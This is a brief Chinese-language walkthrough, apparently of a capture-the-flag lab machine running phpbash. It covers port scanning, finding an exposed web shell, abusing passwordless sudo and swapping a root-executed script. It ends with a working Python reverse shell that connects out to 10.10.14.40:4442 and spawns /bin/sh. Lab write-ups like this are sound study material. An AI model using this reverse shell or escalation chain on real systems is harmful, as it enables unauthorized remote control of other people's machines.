Nmap扫出来就开了一个80端口。
网站打开发现有一篇讲phpbash的文章,文章中提到这个站点也部署了phpbash。
而这个phpbash就是他的名字的意思,一个php文件,可以当做一个远程bash shell用。
dirbuster扫出来发现有一个dev耳机目录,试一试phpbash是不是在里面。

直接用python反弹一个shell回去。
这时候已经可以读取user.txt了。
LinEnum运行一下,发现sudo有点问题。

发现可以以scriptmanager的身份运行sudo而不需要输入密码。
sudo -u scriptmanager bash -i
运行之后就是scriptmanager的身份了。
在根目录发现一个script文件夹,里面有一个test.py和test.txt

直接把test.py内容换成反弹shell的,就可以获得root shell了

import socket,subprocess,os;
s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM);
s.connect(("10.10.14.40",4442));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(\["/bin/sh","-i"\])